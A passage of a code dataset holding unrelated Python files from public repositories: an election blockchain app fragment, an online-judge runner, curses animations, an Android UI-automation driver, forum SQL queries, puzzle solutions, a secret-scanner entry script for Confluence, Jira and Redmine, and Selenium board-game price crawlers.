data=json.dumps(block.__dict__, sort_keys=True))\n\n# #####################################################################################\n# add other routes and code from web_app.py here \n\n\nCONNECTED_NODE_ADDRESS = \"http://127.0.0.1:{}\".format(port)\n\nposts = []\n\n#this function gets the data from the node’s /chain endpoint, parses the data, and stores it locally.\n\ndef fetch_posts():\n \n get_chain_address = \"{}/chain\".format(CONNECTED_NODE_ADDRESS)\n respons = requests.get(get_chain_address)\n if respons.status_code == 200:\n content = []\n chain = json.loads(respons.content)\n for block in chain['chain']:\n for tx in block['transactions']:\n tx['index'] = block['index']\n tx['hash']=block['previous_hash']\n content.append(tx)\n\n# @app.route('/submit',methods=['POST'])\n# @cross_origin()\n# def submit_textarea():\n# region = request.form[\"region\"]\n# constituency = request.form[\"constituency\"]\n# author = request.form[\"author\"]\n# # post_content1 = request.form.get(\"NPP \",\"NPP\")\n# # post_content = request.form.get(\"NDC \",\"NDC\")\n# # username = request.form.get(\"username\",\"username\")\n# party1 = request.form[\"NDC \"]\n# party2 = request.form[\"NPP \"]\n# party1vote= request.form[\"NDC vote_in_number\"]\n# party2vote= request.form[\"NPP vote_in_number\"]\n \n# # post_content = request.form[\"party_name\"]\n# # vote_number= request.form['vote_in_number']\n# # taken out of request form\n# # vote_words= request.form['vote_in_words']\n# rejected_ballot= request.form['rejected_ballot']\n# post_object = {region:{constituency:{author:{party1:party1vote,party2:party2vote,'rejected_ballot':rejected_ballot}}}}\n# # post_object = {'author': author,'party':post_content,'vote_in_number':vote_number,'vote_in_words':vote_words,'rejected_ballot':rejected_ballot,'region':region,\"constituency\":constituency}\n# new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n# print(new_tx_address)\n# requests.post(new_tx_address,json=post_object,headers={'Content-type': 'application/json'})\n \n# # pass the region,constituency,polling station in messages in messages stored in sessions \n# url = ('http://127.0.0.1:8000/polling_station/?region={}&constituency={}&ps={}&party1={}&party2={}&r={}').format(region,constituency,author,party1,party2,rejected_ballot) \n\n# # upon submission b ec offical redirect to polling station results page \n# return post_object\n \n\n@app.route('/')\ndef home():\n return render_template('/index.html')\n\n# set a port here to be used by the submission page \n# if __name__ == '__main__':\n# app.run( host='127.0.0.1',port=9000)","repo_name":"Guy-Koliko/final_bc_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7282769497","text":"import subprocess\nimport os\n\n\ndef compile_code(file_path, lang):\n if lang == \"c\":\n compiler = \"gcc\"\n elif lang == \"cpp\":\n compiler = \"g++\"\n elif lang == \"py\":\n return \"Compilation successful\"\n else:\n return \"Compilation Error\"\n\n curr_dir = os.getcwd()\n try:\n os.chdir(\"OJ/waste\")\n compile_file = subprocess.run([compiler, file_path], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n os.chdir(curr_dir)\n stderror = compile_file.stderr.decode(\"utf-8\")\n if stderror == \"\":\n return \"Compilation successful\"\n else:\n return \"Compilation Error\"\n except:\n os.chdir(curr_dir)\n return \"Compilation Error\"\n\n\ndef run_code(lang, 
ip_data):\n curr_dir = os.getcwd()\n try:\n os.chdir(\"OJ/waste\")\n\n if lang == \"py\":\n result = subprocess.run(\n [\"python\", \"temp.py\"],\n input=ip_data.encode(),\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n timeout=5,\n )\n else:\n result = subprocess.run(\n [\"./a.out\"],\n input=ip_data.encode(),\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n timeout=5,\n )\n os.chdir(curr_dir)\n stdout_output = result.stdout\n stderr_output = result.stderr\n\n if result.returncode != 0:\n raise subprocess.CalledProcessError(\n result.returncode,\n cmd=result.args,\n output=result.stdout,\n stderr=result.stderr,\n )\n return result.stdout.decode(\"utf-8\")\n\n except FileNotFoundError as e:\n os.chdir(curr_dir)\n print(f\"Error: {e.filename} not found.\")\n return \"Error: File not found.\"\n except PermissionError as e:\n os.chdir(curr_dir)\n print(f\"Error: Permission denied for {e.filename}.\")\n return \"Error: Permission denied.\"\n except subprocess.CalledProcessError as e:\n os.chdir(curr_dir)\n print(f\"Error: Command {e.cmd} returned a non-zero exit code {e.returncode}.\")\n print(f\"Standard Output: {e.output}\")\n print(f\"Standard Error: {e.stderr}\")\n return \"Error: Code execution failed.\"\n except subprocess.TimeoutExpired as e:\n os.chdir(curr_dir)\n print(f\"Error: Code execution timed out. {e}\")\n return \"Time Limit Exceeded.\"\n except Exception as e:\n os.chdir(curr_dir)\n print(f\"Error occurred while executing the code: {e}\")\n return \"Error occurred while executing the code.\"\n\n\ndef check_tc(tc, language):\n flag = 1\n j = 0\n idx = 0\n for i in tc:\n j += 1\n result = run_code(language, str(i.tc_input).replace(\" \", \"\\n\"))\n if result == \"Time Limit Exceeded.\":\n return f\"Time Limit Exceeded on tc {j}\"\n result = result.replace(\"\\n\", \"\").replace(\" \", \"\")\n\n if result != i.tc_output:\n flag = 0\n idx = j\n break\n if flag == 0:\n return f\"Wrong Answer on tc {idx}\"\n else:\n return \"Accepted\"\n","repo_name":"ayush1289/online-judge","sub_path":"OJ/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5158801990","text":"import curses\nfrom frame import Frame, FrameModification\nfrom animations import Anim, AnimIterator\nfrom primitives import *\nfrom anim_player import play\n\nfrom random import randint, choice\n\n\n\ndef initialize_curses_colors():\n \"\"\"Initialize the color support of curses (256 colors).\"\"\"\n curses.curs_set(0) # hide the cursor\n curses.start_color()\n curses.use_default_colors()\n # set color_pair for each color\n for i in range(curses.COLORS):\n curses.init_pair(i, i, -1)\n # curses.init_pair(i + 256, i,)\n\ndef screen_saver(fr):\n dot1 = Anim(fr, fadeinout(10, 10, \"•\"))\n dot2 = Anim(fr, fadeinout(10, 11, \"•\"), after=10)\n dot3 = Anim(fr, fadeinout(10, 12, \"•\"), after=20)\n dots = dot1 >> dot2 >> dot3\n play(fr, Anim(fr, dots))\n\ndef main(scr):\n initialize_curses_colors()\n fr = Frame(scr)\n # screen_saver(fr)\n\n # fade_in_out = Anim(fr, fadein(5, 5, \"coucou\")) > Anim(fr, fadeout(5, 5, \"coucou\"))\n\n coucou = Anim(fr, fadein(5, 5, \"coucou\")) >> Anim(fr, fadein(6, 5, \"c'est moi\"))\n coucou2 = Anim(fr, fadein(5, 5, \"coucou\")) >> Anim(fr, fadein(6, 5, \"c'est moi\"))\n hdyd = Anim(fr, fadein(10, 10, \"how do you do ?\"))\n well = Anim(fr, fadein(20, 5, \"je vais well !\"))\n anim = coucou & Anim(fr, coucou)\n\n\n # anim = Anim(fr, addstr(5, 5, 
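# [Editor's sketch, not part of the dataset record above.] Condensed form of
# the judge loop in run_code(): subprocess.run with a wall-clock timeout,
# mapping TimeoutExpired to a TLE verdict and a non-zero exit status to a
# runtime error. The command and the 5-second limit are illustrative.
import subprocess

def run_with_limit(cmd, stdin_text, seconds=5):
    try:
        result = subprocess.run(cmd, input=stdin_text.encode(),
                                capture_output=True, timeout=seconds)
    except subprocess.TimeoutExpired:
        return 'Time Limit Exceeded.'
    if result.returncode != 0:
        return 'Runtime Error: ' + result.stderr.decode('utf-8', 'replace')
    return result.stdout.decode('utf-8')

# e.g. run_with_limit(['python3', 'temp.py'], '1 2\n')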
\"test\", curses.color_pair(1)))\n play(fr, anim)\n\n\n\nif __name__ == \"__main__\":\n curses.wrapper(main)\n\n\n","repo_name":"OsKaR31415/animations","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30381312513","text":"from uiautomator2 import Device\nfrom executor.appium_driver.UIObjectWrapper import UIObjectWrapper\nimport time\nimport uiautomator2 as u2\nfrom Model.App import App\nfrom Model.Task import Task\nfrom monitor.AndroidEventMonitor import AndroidEventMonitor\nfrom util.ARPPersistence import ARPPersistence\nfrom executor.Executor import ExecutionStrategy\nfrom comparison.StateComparison import StateComparisonStrategy\nfrom functools import wraps\n\nkeycodes = {5: 'call',\n 6: 'endcall',\n 3: 'home',\n 82: 'menu',\n 4: 'back',\n 84: 'search',\n 27: 'camera',\n 80: 'focus',\n 111: 'escape',\n 66: 'enter'}\n\n\n# def dialog_box_handler(func):\n# @wraps(func)\n# def wrap(self, *args, **kwargs):\n# while self.device.info['currentPackageName'] != self.capabilities['appPackage']:\n# if len(self.watchers) == 0:\n# break\n# for watcher in self.watchers:\n# if watcher.triggering:\n# self.current_state = watcher.execute(self.current_state)\n# break\n# return func(self, *args, **kwargs)\n#\n# return wrap\n\n\n# appium脚本执行驱动,用来替代appium自身的driver\nclass AppiumScriptDriver:\n def __init__(self, monitor, device: Device, desired_caps=None):\n self.monitor = monitor\n self.device = device\n self.current_state = None\n self.capabilities = {} if not desired_caps else desired_caps\n\n def implicitly_wait(self, time_to_wait):\n time.sleep(time_to_wait)\n\n def find_element(self, by, elem):\n if elem.exists:\n return UIObjectWrapper(elem, self, by)\n else:\n raise Exception('No such element!')\n\n # @dialog_box_handler\n def find_element_by_id(self, id_):\n # time.sleep(2)\n elem = self.device(resourceId=id_)\n return self.find_element({'resourceId': id_}, elem)\n\n # @dialog_box_handler\n def find_element_by_xpath(self, xpath):\n # time.sleep(2)\n elem = self.device.xpath(xpath)\n return self.find_element({'xpath': xpath}, elem)\n\n # @dialog_box_handler\n def find_elements_by_class_name(self, name):\n elems = self.device(className=name)\n ui_objects = []\n for instance, elem in enumerate(elems):\n ui_object = self.find_element({'className': name, 'instance': instance}, elem)\n ui_objects.append(ui_object)\n return ui_objects\n\n # @dialog_box_handler\n def find_element_by_accessibility_id(self, accessibility_id):\n elem = self.device(description=accessibility_id)\n return self.find_element({'description': accessibility_id}, elem)\n\n # @dialog_box_handler\n def find_element_by_android_uiautomator(self, uia_string):\n uia_string = uia_string.strip()\n if uia_string.startswith('new UiSelector'):\n args = uia_string.split('.')[1:]\n identify = {}\n for arg in args:\n k, v = arg.rtrip(')').split('(')\n v = v.strip('\"')\n identify[k] = v\n elem = self.device(**identify)\n return self.find_element(identify, elem)\n\n def save_screenshot(self, filename):\n self.device.screenshot(filename)\n\n # @dialog_box_handler\n def press_keycode(self, keycode):\n # 由于bug 将code映射为具体的键\n if keycode in keycodes:\n keycode = keycodes[keycode]\n self.device.press(keycode)\n\n # @dialog_box_handler\n def scroll(self, origin_el: UIObjectWrapper, destination_el: UIObjectWrapper, duration=600):\n origin_bounds = origin_el.get_attribute('bounds')\n destination_bounds = 
destination_el.get_attribute('bounds')\n origin_x, origin_y = (origin_bounds[0] + origin_bounds[2]) / 2, \\\n (origin_bounds[1] + origin_bounds[3]) / 2\n destination_x, destination_y = (destination_bounds[0] + destination_bounds[2]) / 2, \\\n (destination_bounds[1] + destination_bounds[3]) / 2\n self.swipe(origin_x, origin_y, destination_x, destination_y, duration)\n\n @property\n def page_source(self):\n return self.device.dump_hierarchy()\n\n # @dialog_box_handler\n def back(self):\n self.current_state = self.monitor.before_back(self.current_state)\n self.device.press('back')\n time.sleep(4)\n self.current_state, _ = self.monitor.after_back(self.current_state)[0]\n\n # @dialog_box_handler\n def swipe(self, begin_x, begin_y, end_x, end_y, duration=0):\n self.current_state = self.monitor.before_swipe(self.current_state)\n self.device.swipe(begin_x, begin_y, end_x, end_y, duration / 1000)\n identify = {'begin_x': begin_x, 'begin_y': begin_y, 'end_x': end_x, 'end_y': end_y, 'duration': duration}\n time.sleep(4)\n self.current_state, _ = self.monitor.after_swipe(self.current_state, None, identify)[0]\n\n def launch_app(self):\n self.current_state = self.monitor.before_launch(self.current_state)\n self.device.app_start(self.capabilities['appPackage'], self.capabilities['appActivity'])\n time.sleep(2)\n self.current_state, _ = self.monitor.after_launch(self.current_state)\n\n def close_app(self):\n self.current_state = self.monitor.before_home(self.current_state)\n self.device.press('home')\n time.sleep(2)\n self.current_state, _ = self.monitor.after_home(self.current_state)\n self.current_state = self.monitor.before_stop(self.current_state)\n self.device.app_stop(self.capabilities['appPackage'])\n time.sleep(2)\n self.current_state, _ = self.monitor.after_stop(self.current_state)\n\n def update_capabilities(self, **desired_caps):\n for cap in desired_caps:\n self.capabilities[cap] = desired_caps[cap]\n\n # 判断device和capabilities是否匹配\n @staticmethod\n def check_capabilities(capabilities, device: Device):\n if capabilities is not None:\n if 'appPackage' not in capabilities:\n raise Exception('the attribute appPackage does not in capabilities!')\n d_info = device.device_info\n d_version = d_info['version'].split('.')\n cap_version = capabilities['platformVersion'].split('.')\n if len(d_version) < len(cap_version):\n d_version += ['0'] * (len(cap_version) - len(d_version))\n elif len(cap_version) < len(d_version):\n cap_version += ['0'] * (len(d_version) - len(cap_version))\n if d_version != cap_version:\n raise Exception(\n f\"the version of the device is {d_info['version']} but the platformVersion of the capabilities is {capabilities['platformVersion']}!\")\n else:\n raise Exception(\"missing capabilities!\")\n\n @staticmethod\n def build(desired_caps):\n device = u2.connect_usb()\n # 判断device和capabilities是否匹配\n AppiumScriptDriver.check_capabilities(desired_caps, device)\n app = App(None, None, desired_caps['appActivity'], desired_caps['appPackage'], None)\n task = Task(app, ExecutionStrategy.APPIUM, StateComparisonStrategy.XML, None, app, False)\n monitor = AndroidEventMonitor(task.get_arp(), device)\n driver = AppiumScriptDriver(monitor, device, desired_caps)\n driver.launch_app()\n return driver\n\n def save_result(self, saved_path):\n arpp = ARPPersistence(self.monitor.app, saved_path)\n 
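# [Editor's sketch, not part of the dataset record above.] scroll() above
# swipes between element centres; this is the same centre-of-bounds
# arithmetic on a (left, top, right, bottom) box, with invented numbers.
def centre(bounds):
    left, top, right, bottom = bounds
    return (left + right) / 2, (top + bottom) / 2

print(centre((100, 200, 300, 600)))  # -> (200.0, 400.0)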
arpp.save2disk()\n","repo_name":"entropydec/Android2Harmony","sub_path":"lib/arp/executor/appium_driver/AppiumScriptDriver.py","file_name":"AppiumScriptDriver.py","file_ext":"py","file_size_in_byte":7601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15158774775","text":"__author__ = 'max'\n\nfrom queries.utils import *\n\n\ndef get_post_by_id(cursor, post_id):\n post_id = to_number(post_id, 'post_id')\n query = '''SELECT *\n FROM `Post`\n WHERE `id` = %s\n LIMIT 1;\n '''\n params = (post_id,)\n cursor.execute(query, params)\n\n post = cursor.fetchone()\n if post is None:\n raise NotFound(\"Post with the '%d' id is not found\" % post_id)\n\n prepare_post(post)\n return post\n\n\ndef set_post(cursor, date, thread, message, user, forum, is_deleted, parent, is_approved, is_highlighted, is_edited, is_spam):\n is_deleted = to_bool(is_deleted, 'is_deleted')\n thread = to_number(thread, 'thread')\n\n is_approved = to_bool(is_approved, 'is_approved')\n is_highlighted = to_bool(is_highlighted, 'is_highlighted')\n is_edited = to_bool(is_edited, 'is_edited')\n is_spam = to_bool(is_spam, 'is_spam')\n\n query = '''INSERT INTO `Post` (`date`, `thread`, `message`, `user`, `forum`, `isDeleted`, `parent`, `isApproved`, `isHighlighted`, `isEdited`, `isSpam`)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\n '''\n\n params = (date, thread, message, user, forum, is_deleted, parent, is_approved, is_highlighted, is_edited, is_spam)\n cursor.execute(query, params)\n\n post = {'date': date, 'thread': thread, 'message': message, 'user': user, 'forum': forum,\n 'isDeleted': is_deleted, 'parent': parent, 'isApproved': is_approved, 'isHighlighted': is_highlighted,\n 'isEdited': is_edited, 'isSpam': is_spam, 'dislikes': 0, 'likes': 0, 'points': 0, 'path': ''}\n return post\n\n\ndef set_post_deleted(cursor, post, logical):\n post = to_number(post, 'post')\n query = '''UPDATE `Post`\n SET `isDeleted` = {0}\n WHERE `id` = %s;\n '''.format(logical)\n params = (post,)\n cursor.execute(query, params)\n\n if logical == 'True':\n logical = '- 1'\n else:\n logical = '+ 1'\n\n post = get_post_by_id(cursor, post)\n query = '''UPDATE `Thread`\n SET `posts` = `posts` {0}\n WHERE `id` = %s;\n '''.format(logical)\n params = (post['thread'],)\n cursor.execute(query, params)\n\n\ndef set_post_message(cursor, post, message):\n post = to_number(post, 'post')\n query = '''UPDATE `Post`\n SET `message` = %s\n WHERE `id` = %s;\n '''\n\n params = (message, post)\n cursor.execute(query, params)\n\n\ndef set_post_vote(cursor, post, vote):\n post = to_number(post, 'post')\n\n if vote < 0:\n column = 'dislikes'\n points = '- 1'\n else:\n column = 'likes'\n points = '+ 1'\n\n query = '''UPDATE `Post`\n SET `{0}` = `{0}` + 1, `points` = `points` {1}\n WHERE `id` = %s;\n '''.format(column, points)\n params = (post,)\n cursor.execute(query, params)","repo_name":"xammi/Curs_DB","sub_path":"queries/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"39662366832","text":"# The \"look and say\" sequence is defined as follows: beginning with the term 1,\n# each subsequent term visually describes the digits appearing in the previous\n# term. 
The first few terms are as follows:\n\n# 1\n# 11\n# 21\n# 1211\n# 111221\n\n# As an example, the fourth term is 1211, since the third term consists of one\n# 2 and one 1.\n\n# Given an integer N, print the Nth term of this sequence.\n\n\ndef look_and_say(n):\n term = '1'\n for _ in range(n):\n term = describe(term)\n\n return term\n\n\ndef describe(term):\n last = term[0]\n count = 1\n ans = ''\n for i in range(1, len(term)):\n if term[i] == last:\n count += 1\n else:\n ans += '{}{}'.format(count, last)\n count = 1\n last = term[i]\n\n return ans + '{}{}'.format(count, last)\n\n\nif __name__ == \"__main__\":\n for i in range(10):\n print(i, '->', look_and_say(i))\n","repo_name":"kemingy/daily-coding-problem","sub_path":"src/look_and_say.py","file_name":"look_and_say.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"23873742527","text":"from src.main.java.algorithms.EasySumSetProblem.solution3 \\\n import calculate_b\nimport pytest\nfrom typing import List\n\n\ntest_data = [\n ([1, 2], [3, 4, 5], ['2', '3']),\n ([3], [5, 6], ['2', '3']),\n ([4, 3, 5, 1], [3, 5, 6, 7, 8, 9], ['2', '4']),\n ([1, 3, 2, 5, 4], [2, 3, 4, 5, 6], ['1'])\n]\n\n\n@pytest.mark.parametrize(\"array_a,array_c,array_b\", test_data)\ndef test_easy_sum_set(array_a: List[int],\n array_c: List[int], array_b: List[str]):\n print(f\"expected = {array_b}\")\n print(f\"actual = {calculate_b(array_a, array_c)}\")\n assert len(array_b) == len(calculate_b(array_a, array_c))\n assert all([a == b for a, b in zip(\n array_b, calculate_b(array_a, array_c))])\n","repo_name":"apetrovskiy/testHaEa","sub_path":"src/test/java/algorithms/EasySumSetProblem/test_easy_sum_set.py","file_name":"test_easy_sum_set.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4675072744","text":"# -*- coding: utf-8 -*-\n\n# input\nN, Y = map(int, input().split())\n\n# solve\nans = [-1] * 3\nfor x in range(N + 1):\n for y in range(N + 1):\n z = N - x - y\n if 10000 * x + 5000 * y + 1000 * z == Y and z >= 0:\n ans = [x, y, z]\n break\n\n# output\nprint(*ans)\n","repo_name":"tapioka324/atcoder","sub_path":"ABC/085/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18576809731","text":"#!/usr/bin/python3\n\nimport json\nimport argparse\nimport time\nimport traceback\nimport sys\nimport uuid\nimport parsers.confluence.parser as confluence_parser\nimport parsers.jira.parser as jira_parser\nimport parsers.redmine.parser as redmine_parser\nfrom termcolor import colored, cprint\nfrom datetime import datetime\n\n\ndef generate_job_id():\n return str(uuid.uuid4())\n\n\ndef check_conf(service_name: str):\n conf = {}\n if config[service_name]['url'] and len(config[service_name]['url']) != 0:\n conf['url'] = config[service_name]['url']\n else:\n raise Exception(f'{service_name} url error')\n\n if config[service_name]['credentials']['login'] and len(config[service_name]['credentials']['login']) != 0:\n conf['login'] = config[service_name]['credentials']['login']\n else:\n raise Exception(f'{service_name} login error')\n\n if config[service_name]['credentials']['password'] and len(config[service_name]['credentials']['password']) != 0:\n conf['password'] = config[service_name]['credentials']['password']\n else:\n raise Exception(f'{service_name} 
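# [Editor's sketch, not part of the dataset record above.] The describe()
# step of the look-and-say record above is a run-length pass, which
# itertools.groupby expresses directly: '1211' -> one 1, one 2, two 1s
# -> '111221'.
from itertools import groupby

def describe(term):
    return ''.join(f'{len(list(g))}{d}' for d, g in groupby(term))

term = '1'
for _ in range(5):
    print(term)            # 1, 11, 21, 1211, 111221
    term = describe(term)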
password error')\n\n if 'spaces' in config[service_name]:\n conf['spaces'] = config[service_name]['spaces']\n else:\n raise Exception('Spaces error')\n\n if 'oauth' in config[service_name]:\n conf['oauth'] = config[service_name]['oauth']\n conf['client_id'] = config[service_name]['credentials']['client_id']\n conf['client_secret'] = config[service_name]['credentials']['client_secret']\n conf['consumer_key'] = config[service_name]['credentials']['consumer_key']\n conf['private_key'] = config[service_name]['credentials']['private_key']\n else:\n raise Exception('Spaces error')\n\n\n\n if 'context_capture_span' in config['base_config']:\n conf['context_capture_span'] = config['base_config']['context_capture_span']\n else:\n conf['re_scan'] = 50\n\n if config['base_config']['re_scan']:\n conf['re_scan'] = config['base_config']['re_scan']\n else:\n conf['re_scan'] = True\n\n if config['base_config']['uuid_scan']:\n conf['uuid_scan'] = config['base_config']['uuid_scan']\n else:\n conf['uuid_scan'] = True\n\n if config['base_config']['twartefacts_scan']:\n conf['twartefacts_scan'] = config['base_config']['twartefacts_scan']\n else:\n conf['twartefacts_scan'] = True\n\n if config['base_config']['experimental_scan']:\n conf['experimental_scan'] = config['base_config']['experimental_scan']\n else:\n conf['experimental_scan'] = False\n\n if config['base_config']['gdocs_search']:\n conf['gdocs_search'] = config['base_config']['gdocs_search']\n else:\n conf['gdocs_search'] = False\n\n if config['base_config']['notifications']['myteam']['enabled'] is True:\n conf['myteam_notifications'] = config['base_config']['notifications']['myteam']\n\n if config['base_config']['notifications']['defectDojo']['enabled'] is True:\n conf['defecdojo_notifications'] = config['base_config']['notifications']['defectDojo']\n\n conf['badlist'] = config['lists']['badlist']\n conf['badrootlist'] = config['lists']['badrootlist']\n conf['job_id'] = generate_job_id()\n\n return conf\n\n\ndef run(config: dict):\n if not isinstance(config['lists']['badlist'], list):\n raise Exception('badlist error in config file')\n\n if not isinstance(config['lists']['badrootlist'], list):\n raise Exception('badrootlist error in config file')\n\n if args.redmine is True:\n conf = check_conf('redmine')\n print_start_out(conf['url'], 'redmine', conf['job_id'])\n redmine_parser.run(conf)\n\n if args.confluence is True:\n conf = check_conf('confluence')\n # print(conf)\n print_start_out(conf['url'], 'confluence', conf['job_id'])\n c = confluence_parser.ConfluenceParser(conf)\n c.run()\n\n if args.jira is True:\n conf = check_conf('jira')\n # print(conf)\n print_start_out(conf['url'], 'jira', conf['job_id'])\n j = jira_parser.JiraParser(conf)\n j.run()\n\n\ndef print_start_out(url: str, type: str, job_id: str):\n msg_1 = f\"Start {type} parser: {url}\"\n msg_2 = f\"Started job ID: {job_id}\"\n print(colored(msg_1, 'white', on_color='on_cyan', attrs=['bold','blink']))\n print(colored(\"\".join([\"=\" * len(msg_1)]), 'magenta', on_color='on_white', attrs=['bold','blink']))\n print(colored(msg_2, 'white', on_color='on_cyan', attrs=['bold','blink']))\n\n\ndef get_config(path: str):\n with open(path) as json_file:\n config_data = json.load(json_file)\n return config_data\n\n\nif __name__ == '__main__':\n start_time = time.time()\n try:\n parser = argparse.ArgumentParser(description='Sensitive finder v0.1')\n parser.add_argument('--config', help='Path to json config file', default='config.json')\n parser.add_argument('--redmine', help='Run Redmine parser', 
action='store_true', default=False)\n parser.add_argument('--confluence', help='Run Confluence parser', action='store_true', default=False)\n parser.add_argument('--jira', help='Run Jira parser', action='store_true', default=False)\n parser.add_argument('--debug', help='Enable debug', action='store_true', default=False)\n\n args = parser.parse_args()\n try:\n config = get_config(args.config)\n except Exception as ex:\n print(ex)\n sys.exit(0)\n\n try:\n run(config)\n except Exception as ex:\n print(ex)\n if args.debug == True:\n print(traceback.format_exc())\n finally:\n print(\"time elapsed: {:.2f}s\".format(time.time() - start_time))","repo_name":"doublestraus/secret-finder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20578271951","text":"import json\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom Jogo import *\nimport time\n\nclass Crawler():\n\n def __init__(self, titulo, url) -> None:\n self.titulo = titulo\n self.url = url\n \n\n def accessPage(self):\n driver = webdriver.Firefox()\n driver.get(self.url)\n\n\nclass CrawlerGalapagos(Crawler):\n\n def __init__(self, titulo, url, jogos) -> None:\n Crawler.__init__(self, titulo, url)\n self.extractGalapagos(jogos)\n\n\n \n\n def extractGalapagos(self, jogos):\n if( self.url.nomeSite == 'Galapagos'):\n\n options = Options()\n options.add_argument(\"--headless\")\n driver = webdriver.Firefox(options=options)\n\n driver.get('https://www.mundogalapagos.com.br/')\n time.sleep(5)\n\n elem = driver.find_element(By.XPATH, '//*[@id=\"CC-headerWidget-Search\"]')\n elem.clear()\n elem.send_keys(self.titulo)\n elem.send_keys(Keys.RETURN)\n time.sleep(5)\n\n\n ts = driver.find_elements(By.XPATH , \"//article/div[contains(@class,'product-cover')]\")\n print(len(ts))\n \n\n\n href =[]\n for i in range(0,len(ts)):\n h = ts[i].find_element(By.TAG_NAME, 'a')\n href.append(h.get_attribute(\"href\"))\n #print(href)\n \n if (len(ts) == 0):\n return -1\n else:\n for page in href:\n driver.get(page)\n time.sleep(5)\n tn = driver.find_elements(By.CLASS_NAME , 'product-title')\n #print(ts[0].text)\n te = driver.find_elements(By.CLASS_NAME , 'info-item-text')\n print(len(te))\n if(len(te) >= 3 ):\n numjogs = te[0].text\n idade = int(te[1].text.removesuffix('+'))\n tempo = te[2].text\n else:\n numjogs = None\n idade = None\n tempo = None\n \n tp = driver.find_elements(By.CLASS_NAME , 'best-price')\n disp=''\n preco =''\n if(len(tp) == 0):\n disp = False\n preco = None\n else:\n disp = True\n preco = tp[0].text \n preco = float(preco.removeprefix('R$ ').replace(',', '.'))\n #print(ts[0].text)\n print(tn[0].text, disp, numjogs, idade, tempo, \"Mundo Galapagos\", self.url.nomeSite, preco)\n\n jogos.append(Jogo(tn[0].text, disp, numjogs, idade, tempo, \"Mundo Galapagos\", self.url.nomeSite, preco))\n driver.close()\n\nclass CrawlerPlayEasy(Crawler):\n\n def __init__(self, titulo, url, jogos) -> None:\n Crawler.__init__(self, titulo, url)\n self.extractPlayEasy(jogos)\n\n\n \n\n def extractPlayEasy(self, jogos):\n \n titulo = self.titulo\n titulo = titulo.replace(':', '')\n jogo = Jogo('', False, '', 0, '', '', 'PlayEasy', 0.0)\n\n options = Options()\n options.add_argument(\"--headless\")\n driver = webdriver.Firefox(options=options)\n driver.get('https://www.playeasy.com.br/')\n\n 
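# [Editor's sketch, not part of the dataset record above.] The crawlers
# above pace themselves with fixed time.sleep() calls; an explicit wait is
# the usual Selenium alternative: poll for the element up to a timeout.
# The locator below is illustrative only.
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

def wait_for(driver, xpath, timeout=10):
    return WebDriverWait(driver, timeout).until(
        EC.presence_of_element_located((By.XPATH, xpath)))

# e.g. elem = wait_for(driver, '//*[@id="search"]')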
time.sleep(3)\n elem = driver.find_element(By.XPATH, '//*[@id=\"search\"]')\n elem.clear()\n elem.send_keys(titulo)\n elem.send_keys(Keys.RETURN)\n\n time.sleep(5)\n\n lis = driver.find_elements(By.TAG_NAME, 'li')\n\n i = []\n for li in lis:\n if titulo in li.text:\n i.append(li)\n\n #print(len(driver.find_element(By.XPATH, f'/html/body/main/div[6]/section/div[4]/section/ul/li')))\n assert 'No results found.' not in driver.page_source\n for i in range(1, len(i)):\n driver.find_element(By.XPATH, f'/html/body/main/div[6]/section/div[4]/section/ul/li[{i}]').click()\n try:\n titulo = driver.find_element(By.XPATH,'/html/body/main/div[6]/section/div[2]/article/div[1]/div[2]/div/form/div[2]/h2').text\n except:\n titulo = None\n print(\"algo deu errado com o titulo\")\n disponibilidade = True if 'Em estoque' in driver.find_element(By.XPATH, '//*[@id=\"info-secundaria\"]').text else False\n preco = None if disponibilidade is False else driver.find_element(By.XPATH, '/html/body/main/div[6]/section/div[2]/article/div[1]/div[2]/div/form/div[6]/div[1]/div[1]/div/span/span[1]').text\n if preco:\n preco = float(preco.removeprefix('R$ ').replace(',', '.'))\n else:\n preco = None\n\n num = 4\n\n # O TR MUDA PORQUE AS ESPECIFICACOES TECNICAS SAO MUITO BUGADAS, TEM QUE RESOLVER\n try:\n numJogadores = driver.find_element(By.XPATH, f'/html/body/main/div[6]/section/div[2]/article/div[{num}]/div/div/table/tbody/tr[5]/td').text\n except:\n numJogadores = None\n print(\"algo deu errado com numero de jogadores de \" + titulo)\n try:\n idade = int(driver.find_element(By.XPATH, f'/html/body/main/div[6]/section/div[2]/article/div[{num}]/div/div/table/tbody/tr[3]/td').text.removesuffix('+'))\n except:\n idade = None\n print(\"algo deu errado com idade jogador de \" + titulo)\n try:\n tempoJogo = driver.find_element(By.XPATH, 